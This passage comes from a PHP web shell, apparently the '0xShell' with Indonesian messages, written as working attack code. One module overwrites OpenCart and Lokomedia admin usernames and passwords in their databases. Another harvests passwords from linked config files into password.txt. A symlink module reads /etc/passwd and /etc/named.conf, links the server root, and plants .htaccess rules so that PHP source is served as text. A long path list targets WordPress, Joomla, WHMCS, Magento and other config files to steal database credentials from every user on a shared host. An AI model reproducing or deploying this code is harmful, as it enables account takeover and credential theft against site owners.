  1216. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1217. $db = mysql_select_db($dbname);
  1218. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1219. $result = mysql_fetch_array($q);
  1220. $id = $result[user_id];
  1221. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1222. if($target == '') {
  1223. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1224. } else {
  1225. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1226. }
  1227. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE user_id='$id'");
  1228. echo "[ ".$file_conf." ]<br>";
  1229. echo "CMS => OpenCart<br>";
  1230. echo $url_target;
  1231. if(!$update OR !$conn OR !$db) {
  1232. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1233. } else {
  1234. echo "[+] username: <font color=lime>$user</font><br>";
  1235. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1236. }
  1237. mysql_close($conn);
  1238. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1239. $dbhost = ambilkata($config,'server = "','"');
  1240. $dbuser = ambilkata($config,'username = "','"');
  1241. $dbpass = ambilkata($config,'password = "','"');
  1242. $dbname = ambilkata($config,'database = "','"');
  1243. $prefix = "users";
  1244. $option = "identitas";
  1245. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1246. $db = mysql_select_db($dbname);
  1247. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1248. $result = mysql_fetch_array($q);
  1249. $target = $result[alamat_website];
  1250. if($target == '') {
  1251. $target2 = $result[url];
  1252. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1253. if($target2 == '') {
  1254. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1255. } else {
  1256. $cek_login3 = file_get_contents("$target2/adminweb/");
  1257. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1258. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1259. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1260. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1261. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1262. } else {
  1263. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1264. }
  1265. }
  1266. } else {
  1267. $cek_login = file_get_contents("$target/adminweb/");
  1268. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1269. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1270. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1271. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1272. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1273. } else {
  1274. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1275. }
  1276. }
  1277. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE level='admin'");
  1278. echo "[ ".$file_conf." ]<br>";
  1279. echo "CMS => Lokomedia<br>";
  1280. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1281. echo $url_target2;
  1282. } else {
  1283. echo $url_target;
  1284. }
  1285. if(!$update OR !$conn OR !$db) {
  1286. echo "[-] <font color=red>".mysql_error()."</font><br><br>";
  1287. } else {
  1288. echo "[+] username: <font color=lime>$user</font><br>";
  1289. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1290. }
  1291. mysql_close($conn);
  1292. }
  1293. }
  1294. }
  1295. }
  1296. elseif(isset($_GET['do']) && ($_GET['do'] == 'grabpass')) {
  1297. if($_POST['gass']) {
  1298. echo "<center><h1>Config Password Grabber</h1>
  1299. <form method='post'>
  1300. Link Config: <br>
  1301. <textarea name='link' style='width: 450px; height:250px;'>";
  1302. UrlLoop($_POST['linkconf'],'txt');
  1303. echo"</textarea><br>
  1304. <input type='submit' style='width: 450px;' name='grabpass' value='Hajar!!'>
  1305. </form></center>";
  1306. } else {
  1307. echo "<center><h1>Joomla Auto Change User 2</h1>
  1308. <form method='post'>
  1309. Link Config: <br>
  1310. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/0xsym/'><br>
  1311. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1312. </form></center>";
  1313. }
  1314. if($_POST['grabpass']) {
  1315.  
  1316.  
  1317. $link = explode("\r\n", $_POST['link']);
  1318. echo '<textarea>';
  1319. foreach($link as $dir_config) {
  1320. $ambilpass=ambil_password($dir_config);
  1321. $hh=@file_get_contents("password.txt");
  1322. @file_put_contents("password.txt", $hh.$ambilpass);
  1323.  
  1324. echo $ambilpass;
  1325.  
  1326.  
  1327. }
  1328. echo '</textarea>';
  1329. }
  1330. }
  1331. elseif(isset($_GET['do']) && ($_GET['do'] == 'symlink')) {
  1332.  
  1333. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1334. $d0mains = @file("/etc/named.conf");
  1335. ##httaces
  1336. if($d0mains){
  1337. @mkdir("0xsymlink",0777);
  1338. @chdir("0xsymlink");
  1339. @exe("ln -s / root");
  1340. $file3 = 'Options Indexes FollowSymLinks
  1341. DirectoryIndex jancox.htm
  1342. AddType text/plain .php
  1343. AddHandler text/plain .php
  1344. Satisfy Any';
  1345. $fp3 = fopen('.htaccess','w');
  1346. $fw3 = fwrite($fp3,$file3);
  1347. @fclose($fp3);
  1348. echo "
  1349. <table align=center border=1 style='width:60%;border-color:#333333;'>
  1350. <tr>
  1351. <td align=center><font size=2>S. No.</font></td>
  1352. <td align=center><font size=2>Domains</font></td>
  1353. <td align=center><font size=2>Users</font></td>
  1354. <td align=center><font size=2>Symlink</font></td>
  1355. </tr>";
  1356. $dcount = 1;
  1357. foreach($d0mains as $d0main){
  1358. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1359. flush();
  1360. if(strlen(trim($domains[1][0])) > 2){
  1361. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  1362. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  1363. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  1364. <td>".$user['name']."</td>
  1365. <td><a href='$full/0xsymlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  1366. flush();
  1367. $dcount++;}}}
  1368. echo "</table>";
  1369. }else{
  1370. $TEST=$etcpasswd;
  1371. if ($TEST){
  1372. @mkdir("0xsymlink",0777);
  1373. @chdir("0xsymlink");
  1374. exe("ln -s / root");
  1375. $file3 = 'Options Indexes FollowSymLinks
  1376. DirectoryIndex jancox.htm
  1377. AddType text/plain .php
  1378. AddHandler text/plain .php
  1379. Satisfy Any';
  1380. $fp3 = fopen('.htaccess','w');
  1381. $fw3 = fwrite($fp3,$file3);
  1382. @fclose($fp3);
  1383. echo "
  1384. <table align=center border=1><tr>
  1385. <td align=center><font size=3>S. No.</font></td>
  1386. <td align=center><font size=3>Users</font></td>
  1387. <td align=center><font size=3>Symlink</font></td></tr>";
  1388. $dcount = 1;
  1389. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1390. // $file=$etcpasswd;
  1391. while(!feof($file)){
  1392. $s = fgets($file);
  1393. $matches = array();
  1394. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1395. $matches = str_replace("home/","",$matches[1]);
  1396. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1397. continue;
  1398. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1399. <td align=center><font class=txt>" . $matches . "</td>";
  1400. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1401. $dcount++;}fclose($file);
  1402. echo "</table>";
  1403. }else{
  1404.  
  1405. if($os != "Windows"){
  1406. @mkdir("0xsymlink",0777);
  1407. @chdir("0xsymlink");
  1408. @exe("ln -s / root");
  1409. $file3 = '
  1410. Options Indexes FollowSymLinks
  1411. DirectoryIndex jancox.htm
  1412. AddType text/plain .php
  1413. AddHandler text/plain .php
  1414. Satisfy Any
  1415. ';
  1416. $fp3 = fopen('.htaccess','w');
  1417. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1418. echo "
  1419. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  1420. <table align=center border=1><tr>
  1421. <td align=center><font size=3>ID</font></td>
  1422. <td align=center><font size=3>Users</font></td>
  1423. <td align=center><font size=3>Symlink</font></td></tr>";
  1424. $temp = "";$val1 = 0;$val2 = 1000;
  1425. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1426. if ($uid)$temp .= join(':',$uid)."\n";}
  1427. echo '<br/>';$temp = trim($temp);$file5 =
  1428. fopen("test.txt","w");
  1429. fputs($file5,$temp);
  1430. fclose($file5);$dcount = 1;$file =
  1431. fopen("test.txt", "r") or exit("Unable to open file!");
  1432. while(!feof($file)){$s = fgets($file);$matches = array();
  1433. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1434. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1435. continue;
  1436. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1437. <td align=center><font class=txt>" . $matches . "</td>";
  1438. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1439. $dcount++;}
  1440. fclose($file);
  1441. echo "</table></div></center>";unlink("test.txt");
  1442. } else
  1443. echo "<center><font size=3>Cannot create Symlink</font></center>";
  1444. }
  1445. }
  1446. }
  1447. elseif(isset($_GET['do']) && ($_GET['do'] == 'config')) {
  1448. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1449. echo '<script>alert("Tidak bisa di gunakan di server windows")</script>';
  1450. exit;
  1451. }
  1452. if($_POST){ if($_POST['tipe'] == 'grabsymv') {
  1453. @mkdir("0xsymv", 0777);
  1454. exe("ln -s / 0xsymv/root");
  1455. $htaccess="Options Indexes FollowSymLinks
  1456. DirectoryIndex jancox.htm
  1457. AddType text/plain .php
  1458. AddHandler text/plain .php
  1459. Satisfy Any";
  1460. @file_put_contents("0xsymv/.htaccess",$htaccess);
  1461. $etc_passwd=$_POST['passwd'];
  1462.  
  1463. $etc_passwd=explode("\n",$etc_passwd);
  1464. foreach($etc_passwd as $passwd){
  1465. $pawd=explode(":",$passwd);
  1466. $user =$pawd[5];
  1467. $usera = preg_replace('/\/var\/www\/vhosts\//', '', $user);
  1468. if (preg_match('/vhosts/i',$user)){
  1469. exe("ln -s ".$user."/httpdocs/wp-config.php 0xsymv/".$usera."-Wordpress.txt");
  1470. exe("ln -s ".$user."/httpdocs/configuration.php 0xsymv/".$usera."-Joomla.txt");
  1471. exe("ln -s ".$user."/httpdocs/config/koneksi.php 0xsymv/".$usera."-Lokomedia.txt");
  1472. exe("ln -s ".$user."/httpdocs/forum/config.php 0xsymv/".$usera."-phpBB.txt");
  1473. exe("ln -s ".$user."/httpdocs/sites/default/settings.php 0xsymv/".$usera."-Drupal.txt");
  1474. exe("ln -s ".$user."/httpdocs/config/settings.inc.php 0xsymv/".$usera."-PrestaShop.txt");
  1475. exe("ln -s ".$user."/httpdocs/app/etc/local.xml 0xsymv/".$usera."-Magento.txt");
  1476. exe("ln -s ".$user."/httpdocs/admin/config.php 0xsymv/".$usera."-OpenCart.txt");
  1477. exe("ln -s ".$user."/httpdocs/application/config/database.php 0xsymv/".$usera."-Ellislab.txt");
  1478. }}}
  1479. if($_POST['tipe'] == 'grabsym') {
  1480. @mkdir("0xsym", 0777);
  1481. @symlink("/","0xsym/root");
  1482. $htaccess="Options Indexes FollowSymLinks
  1483. DirectoryIndex jancox.htm
  1484. AddType text/plain .php
  1485. AddHandler text/plain .php
  1486. Satisfy Any";
  1487. @file_put_contents("0xsym/.htaccess",$htaccess);}
  1488. if($_POST['tipe'] == 'grabsym404') {
  1489. @mkdir("0xsym404", 0777);
  1490. @symlink("/","0xsym404/root");
  1491. $htaccess="Options Indexes FollowSymLinks
  1492. DirectoryIndex jancox.htm
  1493. AddType text/plain .php
  1494. AddHandler text/plain .php
  1495. Satisfy Any
  1496. IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
  1497. AddIcon '' ^^DIRECTORY^^
  1498. DefaultIcon ''
  1499. IndexIgnore *.txt404
  1500. IndexStyleSheet 'https://0x1999.github.io/0xShell/style/melex.css'
  1501. RewriteEngine On
  1502. RewriteCond %{REQUEST_FILENAME} ^.*0xsym404 [NC]
  1503. RewriteRule \.txt$ %{REQUEST_URI}404 [L,R=302.NC]";
  1504. @file_put_contents("0xsym404/.htaccess",$htaccess);
  1505. }
  1506. if($_POST['tipe'] == 'grab') {
  1507. mkdir("0xgrab", 0777);
  1508. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  1509. $htc = fopen("0xgrab/.htaccess","w");
  1510. fwrite($htc, $isi_htc);
  1511. }
  1512. $passwd = $_POST['passwd'];
  1513.  
  1514. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  1515. foreach($user_config[1] as $user_cox) {
  1516. $grab_config = array(
  1517. "/home/$user_cox/.accesshash" => "WHM-accesshash",
  1518. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1519. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  1520. "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  1521. "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  1522. "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  1523. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  1524. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
  1525. "/home/$user_cox/public_html/vb/includes/config.php" => "Vbulletin",
  1526. "/home/$user_cox/public_html/includes/config.php" => "Vbulletin",
  1527. "/home/$user_cox/public_html/forum/includes/config.php" => "Vbulletin",
  1528. "/home/$user_cox/public_html/forums/includes/config.php" => "Vbulletin",
  1529. "/home/$user_cox/public_html/cc/includes/config.php" => "Vbulletin",
  1530. "/home/$user_cox/public_html/inc/config.php" => "MyBB",
  1531. "/home/$user_cox/public_html/includes/configure.php" => "OsCommerce",
  1532. "/home/$user_cox/public_html/shop/includes/configure.php" => "OsCommerce",
  1533. "/home/$user_cox/public_html/os/includes/configure.php" => "OsCommerce",
  1534. "/home/$user_cox/public_html/oscom/includes/configure.php" => "OsCommerce",
  1535. "/home/$user_cox/public_html/products/includes/configure.php" => "OsCommerce",
  1536. "/home/$user_cox/public_html/cart/includes/configure.php" => "OsCommerce",
  1537. "/home/$user_cox/public_html/inc/conf_global.php" => "IPB",
  1538. "/home/$user_cox/public_html/wp-config.php" => "Wordpress",
  1539. "/home/$user_cox/public_html/wp/test/wp-config.php" => "Wordpress",
  1540. "/home/$user_cox/public_html/blog/wp-config.php" => "Wordpress",
  1541. "/home/$user_cox/public_html/beta/wp-config.php" => "Wordpress",
  1542. "/home/$user_cox/public_html/portal/wp-config.php" => "Wordpress",
  1543. "/home/$user_cox/public_html/site/wp-config.php" => "Wordpress",
  1544. "/home/$user_cox/public_html/wp/wp-config.php" => "Wordpress",
  1545. "/home/$user_cox/public_html/WP/wp-config.php" => "Wordpress",
  1546. "/home/$user_cox/public_html/news/wp-config.php" => "Wordpress",
  1547. "/home/$user_cox/public_html/wordpress/wp-config.php" => "Wordpress",
  1548. "/home/$user_cox/public_html/test/wp-config.php" => "Wordpress",
  1549. "/home/$user_cox/public_html/demo/wp-config.php" => "Wordpress",
  1550. "/home/$user_cox/public_html/home/wp-config.php" => "Wordpress",
  1551. "/home/$user_cox/public_html/v1/wp-config.php" => "Wordpress",
  1552. "/home/$user_cox/public_html/v2/wp-config.php" => "Wordpress",
  1553. "/home/$user_cox/public_html/press/wp-config.php" => "Wordpress",
  1554. "/home/$user_cox/public_html/new/wp-config.php" => "Wordpress",
  1555. "/home/$user_cox/public_html/blogs/wp-config.php" => "Wordpress",
  1556. "/home/$user_cox/public_html/configuration.php" => "Joomla",
  1557. "/home/$user_cox/public_html/blog/configuration.php" => "Joomla",
  1558. "/home/$user_cox/public_html/submitticket.php" => "^WHMCS",
  1559. "/home/$user_cox/public_html/cms/configuration.php" => "Joomla",
  1560. "/home/$user_cox/public_html/beta/configuration.php" => "Joomla",
  1561. "/home/$user_cox/public_html/portal/configuration.php" => "Joomla",
  1562. "/home/$user_cox/public_html/site/configuration.php" => "Joomla",
  1563. "/home/$user_cox/public_html/main/configuration.php" => "Joomla",
  1564. "/home/$user_cox/public_html/home/configuration.php" => "Joomla",
  1565. "/home/$user_cox/public_html/demo/configuration.php" => "Joomla",
  1566. "/home/$user_cox/public_html/test/configuration.php" => "Joomla",
  1567. "/home/$user_cox/public_html/v1/configuration.php" => "Joomla",
  1568. "/home/$user_cox/public_html/v2/configuration.php" => "Joomla",
  1569. "/home/$user_cox/public_html/joomla/configuration.php" => "Joomla",
  1570. "/home/$user_cox/public_html/new/configuration.php" => "Joomla",
  1571. "/home/$user_cox/public_html/WHMCS/submitticket.php" => "WHMCS",
  1572. "/home/$user_cox/public_html/whmcs1/submitticket.php" => "WHMCS",
  1573. "/home/$user_cox/public_html/Whmcs/submitticket.php" => "WHMCS",
  1574. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
  1575. "/home/$user_cox/public_html/whmcs/submitticket.php" => "WHMCS",
  1576. "/home/$user_cox/public_html/WHMC/submitticket.php" => "WHMCS",
  1577. "/home/$user_cox/public_html/Whmc/submitticket.php" => "WHMCS",
  1578. "/home/$user_cox/public_html/whmc/submitticket.php" => "WHMCS",
  1579. "/home/$user_cox/public_html/WHM/submitticket.php" => "WHMCS",
  1580. "/home/$user_cox/public_html/Whm/submitticket.php" => "WHMCS",
  1581. "/home/$user_cox/public_html/whm/submitticket.php" => "WHMCS",
  1582. "/home/$user_cox/public_html/HOST/submitticket.php" => "WHMCS",
  1583. "/home/$user_cox/public_html/Host/submitticket.php" => "WHMCS",
  1584. "/home/$user_cox/public_html/host/submitticket.php" => "WHMCS",
  1585. "/home/$user_cox/public_html/SUPPORTES/submitticket.php" => "WHMCS",
  1586. "/home/$user_cox/public_html/Supportes/submitticket.php" => "WHMCS",
  1587. "/home/$user_cox/public_html/supportes/submitticket.php" => "WHMCS",
  1588. "/home/$user_cox/public_html/domains/submitticket.php" => "WHMCS",
  1589. "/home/$user_cox/public_html/domain/submitticket.php" => "WHMCS",
  1590. "/home/$user_cox/public_html/Hosting/submitticket.php" => "WHMCS",
  1591. "/home/$user_cox/public_html/HOSTING/submitticket.php" => "WHMCS",
  1592. "/home/$user_cox/public_html/hosting/submitticket.php" => "WHMCS",
  1593. "/home/$user_cox/public_html/CART/submitticket.php" => "WHMCS",
  1594. "/home/$user_cox/public_html/Cart/submitticket.php" => "WHMCS",
  1595. "/home/$user_cox/public_html/cart/submitticket.php" => "WHMCS",
  1596. "/home/$user_cox/public_html/ORDER/submitticket.php" => "WHMCS",
  1597. "/home/$user_cox/public_html/Order/submitticket.php" => "WHMCS",
  1598. "/home/$user_cox/public_html/order/submitticket.php" => "WHMCS",
  1599. "/home/$user_cox/public_html/CLIENT/submitticket.php" => "WHMCS",
  1600. "/home/$user_cox/public_html/Client/submitticket.php" => "WHMCS",
  1601. "/home/$user_cox/public_html/client/submitticket.php" => "WHMCS",
  1602. "/home/$user_cox/public_html/CLIENTAREA/submitticket.php" => "WHMCS",
  1603. "/home/$user_cox/public_html/Clientarea/submitticket.php" => "WHMCS",
  1604. "/home/$user_cox/public_html/clientarea/submitticket.php" => "WHMCS",
  1605. "/home/$user_cox/public_html/SUPPORT/submitticket.php" => "WHMCS",
  1606. "/home/$user_cox/public_html/Support/submitticket.php" => "WHMCS",
  1607. "/home/$user_cox/public_html/support/submitticket.php" => "WHMCS",
  1608. "/home/$user_cox/public_html/BILLING/submitticket.php" => "WHMCS",
  1609. "/home/$user_cox/public_html/Billing/submitticket.php" => "WHMCS",
  1610. "/home/$user_cox/public_html/billing/submitticket.php" => "WHMCS",
  1611. "/home/$user_cox/public_html/BUY/submitticket.php" => "WHMCS",
  1612. "/home/$user_cox/public_html/Buy/submitticket.php" => "WHMCS",
  1613. "/home/$user_cox/public_html/buy/submitticket.php" => "WHMCS",
  1614. "/home/$user_cox/public_html/MANAGE/submitticket.php" => "WHMCS",
  1615. "/home/$user_cox/public_html/Manage/submitticket.php" => "WHMCS",
  1616. "/home/$user_cox/public_html/manage/submitticket.php" => "WHMCS",
  1617. "/home/$user_cox/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",
  1618. "/home/$user_cox/public_html/ClientSupport/submitticket.php" => "WHMCS",
  1619. "/home/$user_cox/public_html/Clientsupport/submitticket.php" => "WHMCS",
  1620. "/home/$user_cox/public_html/clientsupport/submitticket.php" => "WHMCS",
  1621. "/home/$user_cox/public_html/CHECKOUT/submitticket.php" => "WHMCS",
  1622. "/home/$user_cox/public_html/Checkout/submitticket.php" => "WHMCS",
  1623. "/home/$user_cox/public_html/checkout/submitticket.php" => "WHMCS",
  1624. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1625. "/home/$user_cox/public_html/Billings/submitticket.php" => "WHMCS",
  1626. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
  1627. "/home/$user_cox/public_html/BASKET/submitticket.php" => "WHMCS",
  1628. "/home/$user_cox/public_html/Basket/submitticket.php" => "WHMCS",
  1629. "/home/$user_cox/public_html/basket/submitticket.php" => "WHMCS",
  1630. "/home/$user_cox/public_html/SECURE/submitticket.php" => "WHMCS",
  1631. "/home/$user_cox/public_html/Secure/submitticket.php" => "WHMCS",
  1632. "/home/$user_cox/public_html/secure/submitticket.php" => "WHMCS",
  1633. "/home/$user_cox/public_html/SALES/submitticket.php" => "WHMCS",
  1634. "/home/$user_cox/public_html/Sales/submitticket.php" => "WHMCS",
  1635. "/home/$user_cox/public_html/sales/submitticket.php" => "WHMCS",
  1636. "/home/$user_cox/public_html/BILL/submitticket.php" => "WHMCS",
  1637. "/home/$user_cox/public_html/Bill/submitticket.php" => "WHMCS",
  1638. "/home/$user_cox/public_html/bill/submitticket.php" => "WHMCS",
  1639. "/home/$user_cox/public_html/PURCHASE/submitticket.php" => "WHMCS",
  1640. "/home/$user_cox/public_html/Purchase/submitticket.php" => "WHMCS",
  1641. "/home/$user_cox/public_html/purchase/submitticket.php" => "WHMCS",
  1642. "/home/$user_cox/public_html/ACCOUNT/submitticket.php" => "WHMCS",
  1643. "/home/$user_cox/public_html/Account/submitticket.php" => "WHMCS",
  1644. "/home/$user_cox/public_html/account/submitticket.php" => "WHMCS",
  1645. "/home/$user_cox/public_html/USER/submitticket.php" => "WHMCS",
  1646. "/home/$user_cox/public_html/User/submitticket.php" => "WHMCS",
  1647. "/home/$user_cox/public_html/user/submitticket.php" => "WHMCS",
  1648. "/home/$user_cox/public_html/CLIENTS/submitticket.php" => "WHMCS",
  1649. "/home/$user_cox/public_html/Clients/submitticket.php" => "WHMCS",
  1650. "/home/$user_cox/public_html/clients/submitticket.php" => "WHMCS",
  1651. "/home/$user_cox/public_html/BILLINGS/submitticket.php" => "WHMCS",
  1652. "/home/$user_cox/public_html/Billings/submitticket.php" => "WHMCS",
  1653. "/home/$user_cox/public_html/billings/submitticket.php" => "WHMCS",
  1654. "/home/$user_cox/public_html/MY/submitticket.php" => "WHMCS",
  1655. "/home/$user_cox/public_html/My/submitticket.php" => "WHMCS",
  1656. "/home/$user_cox/public_html/my/submitticket.php" => "WHMCS",
  1657. "/home/$user_cox/public_html/secure/whm/submitticket.php" => "WHMCS",
  1658. "/home/$user_cox/public_html/secure/whmcs/submitticket.php" => "WHMCS",
  1659. "/home/$user_cox/public_html/panel/submitticket.php" => "WHMCS",
  1660. "/home/$user_cox/public_html/clientes/submitticket.php" => "WHMCS",
  1661. "/home/$user_cox/public_html/cliente/submitticket.php" => "WHMCS",
  1662. "/home/$user_cox/public_html/support/order/submitticket.php" => "WHMCS",
  1663. "/home/$user_cox/public_html/bb-config.php" => "BoxBilling",
  1664. "/home/$user_cox/public_html/boxbilling/bb-config.php" => "BoxBilling",
  1665. "/home/$user_cox/public_html/box/bb-config.php" => "BoxBilling",
  1666. "/home/$user_cox/public_html/host/bb-config.php" => "BoxBilling",
  1667. "/home/$user_cox/public_html/Host/bb-config.php" => "BoxBilling",
  1668. "/home/$user_cox/public_html/supportes/bb-config.php" => "BoxBilling",
  1669. "/home/$user_cox/public_html/support/bb-config.php" => "BoxBilling",
  1670. "/home/$user_cox/public_html/hosting/bb-config.php" => "BoxBilling",
  1671. "/home/$user_cox/public_html/cart/bb-config.php" => "BoxBilling",
  1672. "/home/$user_cox/public_html/order/bb-config.php" => "BoxBilling",
  1673. "/home/$user_cox/public_html/client/bb-config.php" => "BoxBilling",
  1674. "/home/$user_cox/public_html/clients/bb-config.php" => "BoxBilling",
  1675. "/home/$user_cox/public_html/cliente/bb-config.php" => "BoxBilling",
  1676. "/home/$user_cox/public_html/clientes/bb-config.php" => "BoxBilling",
  1677. "/home/$user_cox/public_html/billing/bb-config.php" => "BoxBilling",
  1678. "/home/$user_cox/public_html/billings/bb-config.php" => "BoxBilling",
  1679. "/home/$user_cox/public_html/my/bb-config.php" => "BoxBilling",
  1680. "/home/$user_cox/public_html/secure/bb-config.php" => "BoxBilling",
  1681. "/home/$user_cox/public_html/support/order/bb-config.php" => "BoxBilling",
  1682. "/home/$user_cox/public_html/includes/dist-configure.php" => "Zencart",
  1683. "/home/$user_cox/public_html/zencart/includes/dist-configure.php" => "Zencart",
  1684. "/home/$user_cox/public_html/products/includes/dist-configure.php" => "Zencart",
  1685. "/home/$user_cox/public_html/cart/includes/dist-configure.php" => "Zencart",
  1686. "/home/$user_cox/public_html/shop/includes/dist-configure.php" => "Zencart",
  1687. "/home/$user_cox/public_html/includes/iso4217.php" => "Hostbills",
  1688. "/home/$user_cox/public_html/hostbills/includes/iso4217.php" => "Hostbills",
  1689. "/home/$user_cox/public_html/host/includes/iso4217.php" => "Hostbills",
  1690. "/home/$user_cox/public_html/Host/includes/iso4217.php" => "Hostbills",
  1691. "/home/$user_cox/public_html/supportes/includes/iso4217.php" => "Hostbills",
  1692. "/home/$user_cox/public_html/support/includes/iso4217.php" => "Hostbills",
  1693. "/home/$user_cox/public_html/hosting/includes/iso4217.php" => "Hostbills",
  1694. "/home/$user_cox/public_html/cart/includes/iso4217.php" => "Hostbills",
  1695. "/home/$user_cox/public_html/order/includes/iso4217.php" => "Hostbills",
  1696. "/home/$user_cox/public_html/client/includes/iso4217.php" => "Hostbills",
  1697. "/home/$user_cox/public_html/clients/includes/iso4217.php" => "Hostbills",
  1698. "/home/$user_cox/public_html/cliente/includes/iso4217.php" => "Hostbills",
  1699. "/home/$user_cox/public_html/clientes/includes/iso4217.php" => "Hostbills",
  1700. "/home/$user_cox/public_html/billing/includes/iso4217.php" => "Hostbills",
  1701. "/home/$user_cox/public_html/billings/includes/iso4217.php" => "Hostbills",
  1702. "/home/$user_cox/public_html/my/includes/iso4217.php" => "Hostbills",
  1703. "/home/$user_cox/public_html/secure/includes/iso4217.php" => "Hostbills",
  1704. "/home/$user_cox/public_html/support/order/includes/iso4217.php" => "Hostbills"
  1705. );
  1706.  
  1707. foreach($grab_config as $config => $nama_config) {
  1708. if($_POST['tipe'] == 'grab') {
  1709. $ambil_config = file_get_contents($config);
  1710. if($ambil_config == '') {
  1711. } else {
  1712. $file_config = fopen("0xgrab/$user_cox-$nama_config.txt","w");
  1713. fputs($file_config,$ambil_config);
  1714. }
  1715. }
  1716. if($_POST['tipe'] == 'grabsym') {
  1717. @symlink($config,"0xsym/".$user_cox."-".$nama_config.".txt");
  1718. }
  1719. if($_POST['tipe'] == 'grabsym404') {
  1720. $sym404=symlink($config,"0xsym404/".$user_cox."-".$nama_config.".txt");
  1721. if($sym404){
  1722. @mkdir("0xsym404/".$user_cox."-".$nama_config.".txt404", 0777);
  1723. $xsym404="Options Indexes FollowSymLinks
  1724. DirectoryIndex jancox.htm
  1725. HeaderName 0x.txt
  1726. Satisfy Any
  1727. IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
  1728. IndexIgnore *
  1729. IndexStyleSheet 'https://0x1999.github.io/0xShell/style/melex.css'";
  1730.  
  1731. @file_put_contents("0xsym404/".$user_cox."-".$nama_config.".txt404/.htaccess",$xsym404);
  1732.  
  1733. @symlink($config,"0xsym404/".$user_cox."-".$nama_config.".txt404/0x.txt");
  1734.  
  1735. }
  1736.  
  1737. }
